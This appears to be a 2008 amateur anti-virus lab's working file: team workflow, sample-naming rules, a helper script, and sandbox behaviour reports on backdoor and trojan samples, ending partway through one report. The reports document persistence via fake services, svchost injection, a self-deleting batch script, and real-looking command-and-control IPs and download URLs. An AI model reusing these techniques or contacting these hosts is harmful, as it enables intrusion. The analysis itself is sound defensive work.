I. Lab overview
   1. Lab members
   2. Sample collection and submission workflow
   3. Virus pack testing rules
   4. Naming rules for analysed samples
   5. Operation flowchart
II. Analysis reports
   1. Backdoor2008.12.24@001
   2. Backdoor2008.12.24@002
   3. Backdoor2008.12.24@003.zip
   4. Backdoor2008.12.24@003.gz
   5. Backdoor2008.12.24@005
   6. Backdoor2008.12.24@006
   7. Trojan2008.12.24@001
   8. Trojan2008.12.24@002
   9. Trojan2008.12.24@003
   10. Trojan2008.12.24@004
   11. Trojan2008.12.24@005
   12. Trojan2008.12.24@006
   13. Trojan2008.12.24@007
   14. Trojan2008.12.24@008
   15. Trojan2008.12.24@009
   16. Virus2008.12.24@001
   17. Worm2008.12.24@001
   18. Worm2008.12.24@002
   19. Worm2008.12.24@003
III. Anti-virus software test reports
   1. A-Squared Anti-Malware 4.0
   2. Avira AntiVir Personal
   3. Filseclab (費爾托斯特) V7R3
   4. SearchGUI
   5. Kaspersky Internet Security 8.0
   6. Dr.Web anti-virus
   7. Symantec Endpoint Security
   8. McAfee VirusScan Plus
   9. TrendMicro OfficeScan
   10. TrendMicro Internet Security
   11. Kaspersky Anti-Virus
   12. Jiangmin (江民) KV2008
   13. Panda Internet Security
   14. ESET NOD32 Antivirus
   15. Norton Internet Security
   16. PC Tools Internet Security
   17. VBA32 Workstation 1
   18. VBA32 Workstation 2
   19. avast! Antivirus

Lab members
1. Virus collection team: integear, kitman231, 小韋, mizuhara, tdnj
2. Virus analysis team: zha0, asusp4b533, 000110, upside, integear, sylovanas
3. Anti-virus testing team: megakotaro, kitman231, Bug, integear, 戴計, JusticeH, PHT, 小韋, 小狄~, shisin, kennyg, ss30102, kingyeh, tdnj, imdino, lmam w12345k, haol, no.20.fanks
4. PR and reporting team: JusticeH, ss30102

Sample collection and submission workflow
Virus collection team:
1. Collect EXE files as samples.
2. Compress each sample as a ZIP before uploading. The file name format is "sample_name(extension optional)_cv_memberID(the English ID for members with a Chinese ID).zip". Log in to "CollectedVirus" under "VirusDatas" (by FTP) and upload it there.
Virus analysis team:
1. Download samples from "CollectedVirus" under "VirusDatas" and delete them there (so nobody analyses the same sample twice), then upload a copy of the original sample to "VirusBackup" (for later reference).
2. After analysis, rename the sample (rules below) and upload it to "AnalyzedVirus" on the FTP.
3. Then send the analysis report to "AnalyzerReports" under "VirusReports". Reports must be TXT files so they are quick to produce and read. Report name: "threat_name_after_analysis_ar_memberID(the English ID for members with a Chinese ID)".
PR and reporting team:
1. Seven days before each (tentatively monthly) release, download all samples from "AnalyzedVirus" under "VirusReports" and pack them into a sample pack named "AVPClubVirusPack_2009.01.01".
2. Three days before release, start collating all the material; on the final day, compile it into a PDF and publish it on the forum under the name "ACVL_VirReport_2009.01.01".
Anti-virus testing team:
1. Download the sample pack from "FinalVirusPack" under "VirusDatas", run the test, and upload the report (see the template below) to "AntiVirusSoftwaresReports" under "VirusReports". Report name: "AV_software_name_avsr_memberID(the English ID for members with a Chinese ID).txt".
2. Reports must be uploaded three days before each monthly release of the "AVPClub VirLab Prevalent Threat Research Report".

Virus pack testing rules
1. Save the report as a TXT file in the format below and submit it to team 4:
   Anti-virus software: full product name (e.g. AVPClub AntiVirus Plus)
   Anti-virus version: the vendor's own version string (e.g. Kaspersky "8.0.0.506", F-PROT "6.0.9.1", ESET "3.0.684")
   Signature date: the date of the test (e.g. 2008/01/01)
   Heuristic setting: high / medium / basic / default ("default" means the product does not let the heuristic level be changed)
   Test environment: operating system (e.g. Windows Vista Ultimate SP1 x86)
   Notes: optional; write "none" if there is nothing to add
   Reported by the AV software: detected 19 / scanned 58
   Actual number of files: 19 (counted by eye)
   Files removed: 19 (counted by eye)
   Files remaining: 0 (counted by eye)
   Not detected: 0 (counted by eye)
   Detected but quarantine only: 0
   Detected but not removed: 0
   Detected but no action possible: 0
   Detection rate: 19/19 = 100.0%
   Removal rate: 19/19 = 100.0%
   Names of remaining files: none
   Names of files detected but not removed: none
   Names of files detected but quarantine only: none
   Names of files detected but no action possible: none
   Tester: member ID (e.g. Bug)
2. Once the testing team has been told the virus pack is complete, the report must be delivered to team 4 within 1 to 3 weeks.
3. If different heuristic settings give different results, submit two or more reports.
4. If something prevents you from delivering a report, say so in advance.
5. Any other settings go in the Notes field.

Naming rules for analysed samples
After suggestions from several people, the naming rule for samples uploaded by the virus analysis team is unified here. It is based on Trend Micro's naming scheme:
   PrimaryBehaviour!SecondaryBehaviour_SequenceNumber
   (When uploading, follow the "count-off" rule: if someone has already uploaded 001, the next upload is 002, regardless of type.)
Examples:
   TROJ!DownLoader_001_ad_memberID   (trojan; secondary behaviour "downloader")
   WORM!DownLoader_002_ad_memberID   (worm; secondary behaviour "downloader")
   BKDR!AutoRun_003_ad_memberID      (backdoor; secondary behaviour "auto-start")
   VIRS!KillFiles_005_ad_memberID    (virus; secondary behaviour "deletes files")
   VIRS!Inject_006_ad_memberID       (virus; secondary behaviour "infects files")
   TSPY!PWStealer_007_ad_memberID    (spyware; secondary behaviour "password stealer")
   TADE!DownLoader_008_ad_memberID   (adware; secondary behaviour "downloader")
   DIAL!PWStealer_009_ad_memberID    (dialler; secondary behaviour "password stealer")
   TROJ!PWStealer_010_ad_memberID    (trojan; secondary behaviour "password stealer")
If anything is unclear, PM me.
The PR team then only needs to compile the sample pack and strip the trailing "_ad_memberID" from each name.
Note: in force from the second report onwards.
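The file-name conventions above (the _cv_, _ad_, _ar_ and _avsr_ stage tags, the count-off sequence rule and the pack-name stripping) and the counts in the test-report template are mechanical enough to check by script. The following Python is an added example written for this page, not a tool the lab used. The regular expressions, the set of primary-behaviour codes (taken only from the examples above) and the three consistency rules applied to the test-report counts are this example's own reading of the rules.

```python
import re

# Stage tags from the workflow, in the order a sample moves through the lab.
STAGES = {
    "cv": "collected sample (ZIP uploaded by the collection team)",
    "ad": "analysed sample (renamed by the analysis team)",
    "ar": "analysis report (TXT, by the analysis team)",
    "avsr": "anti-virus software test report (TXT, by the testing team)",
}
# Primary-behaviour codes: only those that appear in the page's examples.
PRIMARY_CODES = {"TROJ", "WORM", "BKDR", "VIRS", "TSPY", "TADE", "DIAL"}

# <stem>_<stage>_<memberID>; member IDs contain no underscore but may contain dots or '~'.
STAGE_RE = re.compile(r"^(?P<stem>.+)_(?P<stage>cv|ad|ar|avsr)_(?P<member>[^_]+)$")
# Analysed-sample rule: PRIMARY!Secondary_NNN_ad_memberID
ANALYSED_RE = re.compile(
    r"^(?P<primary>[A-Z]{4})!(?P<secondary>[A-Za-z]+)_(?P<seq>\d{3})_ad_(?P<member>[^_]+)$")


def split_extension(filename):
    """Strip the .zip/.txt the workflow allows (member IDs such as no.20.fanks contain dots)."""
    for ext in (".zip", ".txt"):
        if filename.lower().endswith(ext):
            return filename[:-len(ext)], ext
    return filename, ""


def parse_stage_name(filename):
    """Return the stem, stage, member and extension of any stage file name, or None if invalid."""
    name, ext = split_extension(filename)
    m = STAGE_RE.match(name)
    if not m:
        return None
    return {**m.groupdict(), "ext": ext, "stage_desc": STAGES[m["stage"]]}


def parse_analysed_name(filename):
    """Validate PRIMARY!Secondary_NNN_ad_member and return its parts (seq as int), or None."""
    name, _ = split_extension(filename)
    m = ANALYSED_RE.match(name)
    if not m or m["primary"] not in PRIMARY_CODES:
        return None
    return {**m.groupdict(), "seq": int(m["seq"])}


def next_sequence(existing_names):
    """Count-off rule: the next number follows the highest one already uploaded, regardless of type."""
    seqs = [p["seq"] for p in map(parse_analysed_name, existing_names) if p]
    return "%03d" % (max(seqs, default=0) + 1)


def pack_entry_name(analysed_name):
    """What the PR team ships in the sample pack: the name without the trailing _ad_memberID."""
    p = parse_analysed_name(analysed_name)
    if p is None:
        raise ValueError("not a valid analysed-sample name: %s" % analysed_name)
    return "%s!%s_%03d" % (p["primary"], p["secondary"], p["seq"])


def av_report_rates(counts):
    """Detection and removal rates (percent, one decimal) from a test report's counts.

    Consistency rules assumed by this example (the page gives the template, not the rules):
      detected  = actual - undetected
      removed + quarantine_only + not_removed + no_action = detected
      remaining = undetected + not_removed + no_action   (files still on disk)
    """
    actual = counts["actual"]
    detected = actual - counts["undetected"]
    outcomes = counts["removed"] + counts["quarantine_only"] + counts["not_removed"] + counts["no_action"]
    if outcomes != detected:
        raise ValueError("detection outcomes (%d) do not add up to detected files (%d)" % (outcomes, detected))
    if counts["remaining"] != counts["undetected"] + counts["not_removed"] + counts["no_action"]:
        raise ValueError("remaining-file count is inconsistent with the per-file outcomes")
    return round(100.0 * detected / actual, 1), round(100.0 * counts["removed"] / actual, 1)


if __name__ == "__main__":
    uploaded = ["TROJ!DownLoader_001_ad_integear", "WORM!DownLoader_002_ad_zha0",
                "BKDR!AutoRun_003_ad_000110"]
    print(parse_stage_name("cao_cv_kitman231.zip"))
    print(next_sequence(uploaded), pack_entry_name(uploaded[2]))
    # Constructed counts for a hypothetical run over a 20-file pack.
    print(av_report_rates({"actual": 20, "undetected": 1, "removed": 17, "quarantine_only": 1,
                           "not_removed": 1, "no_action": 0, "remaining": 2}))
```

The member-ID pattern deliberately rejects underscores so that a name such as "cao_vcc_kitman231" (a tag that is not in the rules) is reported as invalid rather than silently accepted.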
Operation flowchart
(The flowchart image is not reproduced in this transcription.)

Analysis report: 1.exe
General information:
  Analysis date: 2008-12-06
  Executable: yes
  File type: EXE
  Uploader: 000110
  Analyst: 000110
  Virus file name: Backdoor2008.12.24@001
Process tree:
  1.exe
  ├ services.exe
  │ └ liocal.exe
  │   └ svchost.exe
  └ cmd.exe
Behaviour of 1.exe:
  Files created:
    C:\WINDOWS\Liocal.exe
    C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat   // the generated name is 6 random letters
  Files written:
    C:\WINDOWS\Liocal.exe
    C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat
  New processes (path, program, arguments):
    c:\windows\system32\cmd.exe  /c C:\DOCUME~1\[User Name]\LOCALS~1\Temp\GOLBUB.bat
  Service Control Manager access:
    c:\windows\system32\services.exe   // dangerous: makes services.exe install a service
Behaviour of services.exe:
  Registry keys created:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard\Security
  Registry values set under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard:
    Type         = 0x00000110 (272)
    Start        = 0x00000002 (2)   // start type "Automatic": runs at every system start
    ErrorControl = 0x00000000 (0)
    ImagePath    = C:\WINDOWS\Liocal.exe
    DisplayName  = AVG Anti_Spyware Guard
    Security\Security = 01 00 14 80 90 00 00 00 9c 00 00 00 14 00 00 00 30 00 00 00 02 00 1c 00 01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
    ObjectName   = LocalSystem
    Description  = AVG Anti-Virus provides anti-virus services to applications and performs real-time protection
    // together these registry writes create a service
  New processes:
    c:\windows\liocal.exe   // started because the service is set to "Automatic"
Behaviour of liocal.exe:
  New processes (path, program, arguments):
    C:\WINDOWS\system32\svchost.exe  73412
  Memory access in another process:
    c:\windows\system32\svchost.exe
  Thread created in another process:
    c:\windows\system32\svchost.exe
    // a freshly started svchost.exe that is then written to and given a thread by liocal.exe: process injection, so the network activity below comes from svchost.exe
Behaviour of cmd.exe:
  Files deleted:
    C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE
    C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat
Behaviour of svchost.exe:
  Connections:
    TCP - 124.226.42.36:2009
Additional information:
  Other behaviour: none
  Contents of GOLBUB.bat:
    :try
    del "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE"
    if exist "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE" goto try
    del %0
    exit
Result:
  Virus type: Backdoor

Analysis report: 2.exe
General information:
  Analysis date: 2008-12-03
  Executable: yes
  File type: EXE
  Uploader: 000110
  Analyst: 000110
  Virus file name: Backdoor2008.12.24@002
Process tree:
  2.exe
  └ rundll32.exe
    └ services.exe
      └ svchost.exe
Behaviour of 2.exe:
  Files created:
    C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp
  Files written:
    C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp
  New processes (path, program, arguments):
    c:\windows\system32\rundll32.exe  "C:\DOCUME~1\VMware\LOCALS~1\Temp\4.tmp" "8A'?________[___[(_______'-6_ _'?窐 '___'IU>#>"
Behaviour of rundll32.exe:
  Files created:
    C:\WINDOWS\system32\Local.dll
  Files written:
    C:\WINDOWS\system32\Local.dll
  Registry keys created:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\Parameters
  Registry values set:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\             Description = (HID)的通過輸入訪問
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\Parameters\  ServiceDll = C:\WINDOWS\system32\Local.dll   // the DLL the "LocalService" service will load
  Service Control Manager access:
    c:\windows\system32\services.exe   // dangerous: makes services.exe install a service
Behaviour of services.exe:
  Registry keys created:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\Security
  Registry values set under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService:
    Type         = 0x00000110 (272)
    Start        = 0x00000002 (2)   // start type "Automatic": runs at every system start
    ErrorControl = 0x00000000 (0)
    ImagePath    = C:\WINDOWS\system32\svchost.exe -k netsvcs
    DisplayName  = intreface Device Access   (sic)
    Security\Security = 01 00 14 80 90 00 00 00 9c 00 00 00 14 00 00 00 30 00 00 00 02 00 1c 00 01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
    ObjectName   = LocalSystem
    // together these registry writes create a service hosted in svchost.exe (netsvcs group), whose code is the ServiceDll set above
Behaviour of svchost.exe:
  Connections:
    TCP - 123.147.0.145:8080
Additional information:
  Other behaviour:
    1. Because the service start type is "Automatic", svchost.exe has loaded Local.dll.
Result:
  Virus type: Backdoor

Analysis report: AntivirusXP_016_MT3wM.exe
  Sample name: AntivirusXP_016_MT3wM.exe
  Type: Trojan-Backdoor
  Virus file name: Backdoor2008.12.24@003.gz
  Uploader: kitman231
  Analyst: asusp4b533
  Analysis date: 20081206
  Analysis tool: ThreatExpert
  Executable: yes
  Notes: lets outside computers connect into the infected machine, i.e. it opens a backdoor.

Analysis report: LiteVideocodecVer.4.exe
General information:
  Analysis date: 2008-12-05
  Executable: yes
  File type: EXE
  Uploader: integear
  Analyst: integear
Process tree:
  LiteVideocodecVer.4.exe   // parent
  └ SVCHOST.exe             // dropped file
Behaviour of LiteVideocodecVer.4.exe:
  Files created:
    SVCHOST.exe               // dropped file
    LiteVideocodecVer.4.exe   // parent
  Service created:
    SVCHOST (state: stopped)
  New processes:
    SVCHOST.exe               // dropped file
    LiteVideocodecVer.4.exe   // parent
  Registry keys created:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST]
      Type = 0x00000110
      Start = 0x00000002
      ErrorControl = 0x00000000
      ImagePath = "%Windir%\SVCHOST.exe"   // note: %Windir%\SVCHOST.exe, not the real %System%\svchost.exe
      DisplayName = "SVCHOST"
      ObjectName = "LocalSystem"
      Description = "ϵͳ� � � � "   // mojibake: a non-ASCII (GBK) string the sandbox could not render
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Security]
      Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0   (truncated in the source)
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Enum]
      0 = "Root\LEGACY_SVCHOST\0000"
      Count = 0x00000001
      NextInstance = 0x00000001
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHOST]
      NextInstance = 0x00000001
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHOST\0000]
      Service = "SVCHOST"
      Legacy = 0x00000001
      ConfigFlags = 0x00000000
      Class = "LegacyDriver"
      ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
      DeviceDesc = "SVCHOST"
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHOST\0000\Control]
      *NewlyCreated* = 0x00000000
      ActiveService = "SVCHOST"
    The same six keys, with identical values, were recorded again under HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\... (CurrentControlSet is a link to the active control set, here ControlSet001, so the sandbox logged every write twice).
  Registry values modified:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent]
      (Default) = 0x0000000C
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
      (Default) = 0x0000000C
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
      CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
      CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
      CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
      CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
      Directory = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
  Files downloaded:
    http://zhmlove.dx2.yilehost.cn/ip.txt
Result:
  Virus type: Backdoor-Hupigon
  Virus file name: Backdoor2008.12.24@003.zip

Analysis report: V1.6.exe
General information:
  Analysis date: 2008-12-05
  Executable: yes
  File type: EXE
  Uploader: integear
  Analyst: integear
Process tree:
  V1.6.exe   // parent
Behaviour of V1.6.exe:
  Files created:
    V1.6.exe   // parent
  New processes:
    V1.6.exe   // parent
  Host modified:
    www.jingziwww.cn
  Files downloaded:
    http://www.jingziwww.cn/kabakeytxt/key.txt
    http://www.jingziwww.cn/kabakeytxt/keyurl.txt
    http://www.jingziwww.cn/kabakeytxt/date.txt
    http://www.jingziwww.cn/kabakeytxt/update1.7.txt
Result:
  Virus type: Backdoor-Hupigon
  Virus file name: Backdoor2008.12.24@006

Analysis report: A0008739.exe
  Sample name: A0008739.exe
  Type: Trojan-Adware-BHO
  Virus file name: Trojan2008.12.24@001
  Uploader: mizuhara
  Analyst: asusp4b533
  Analysis date: 20081206
  Analysis tool: ThreatExpert
  Executable: yes
Files created:
  * %DesktopDir%\Cheap Pharmacy Online.url
  * %DesktopDir%\Search Online.url
  * %DesktopDir%\SMS TRAP.url
  * %DesktopDir%\VIP Casino.url
  * %System%\axvitu.dll
  * %System%\c.ico
  * %System%\m.ico
  * %System%\p.ico
  * %System%\s.ico
Process and memory behaviour:
  Remote DLL injection: %System%\axvitu.dll -> IEXPLORE.EXE
Registry keys created:
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\InprocServer32
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\ProgID
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\Programmable
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\TypeLib
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\VersionIndependentProgID
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid32
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\TypeLib
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid32
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\TypeLib
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1
  * HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID
  * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
  * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}
  * HKEY_CURRENT_USER\Software\Microsoft\Bind
Registry values set:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\VersionIndependentProgID]
    + (Default) = "AlsaLi"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\TypeLib]
    + (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\ProgID]
    + (Default) = "AlsaLi.1"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}\InprocServer32]
    + (Default) = "%System%\axvitu.dll"
    + ThreadingModel = "Apartment"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}]
    + (Default) = "Almsms"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\TypeLib]
    + (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
    + Version = "1.0"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid32]
    + (Default) = "{00020420-0000-0000-C000-000000000046}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}\ProxyStubClsid]
    + (Default) = "{00020420-0000-0000-C000-000000000046}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8DFE3882-5474-4010-BF17-544D1D390117}]
    + (Default) = "_IbduczwEvents"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\TypeLib]
    + (Default) = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}"
    + Version = "1.0"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid32]
    + (Default) = "{00020424-0000-0000-C000-000000000046}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}\ProxyStubClsid]
    + (Default) = "{00020424-0000-0000-C000-000000000046}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEF72F04-58F1-433F-8B51-4C6E85B4605B}]
    + (Default) = "Ibduczw"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32]
    + (Default) = "%System%\axvitu.dll"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR]
    + (Default) = "%System%\"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS]
    + (Default) = "0"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0]
    + (Default) = "ssxzzw Library"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CurVer]
    + (Default) = "AlsaLi.1"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi\CLSID]
    + (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi]
    + (Default) = "Almsms"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1\CLSID]
    + (Default) = "{E9B5BA28-C732-49DC-94CE-9079F7F75F4E}"
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AlsaLi.1]
    + (Default) = "Almsms"
  o [HKEY_CURRENT_USER\Software\Microsoft\Bind]
    + comment2 = "5xxx3913705"
Notes:
  Outbound connection: lookfornewsoftware.com
  Pages downloaded:
    http://lookfornewsoftware.com/cfg1.php
    http://lookfornewsoftware.com/cfg2.php

Analysis report: cao.exe
General information:
  Analysis date: 2008-12-05
  Executable: yes
  File type: EXE (packed with UPack)
  Uploader: kitman231
  Analyst: 000110
Process tree:
  cao.exe
  ├ rundll32.exe
  │ └ cmd.exe
  │   └ zsmscc071001.exe
  │     └ iexplore.exe
  └ cmd.exe (2nd run)
Behaviour of cao.exe:
  Files created:
    C:\WINDOWS\system32\zsmscc071001.exe
    C:\WINDOWS\zsmscc16.ini
    C:\WINDOWS\system32\zsmscc071001.dll
    c:\nmDelm.bat
  Files written:
    C:\WINDOWS\system32\zsmscc071001.exe
    C:\WINDOWS\zsmscc16.ini
    C:\WINDOWS\system32\zsmscc071001.dll
    C:\nmDelm.bat
  Registry keys created:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
  Registry values set:
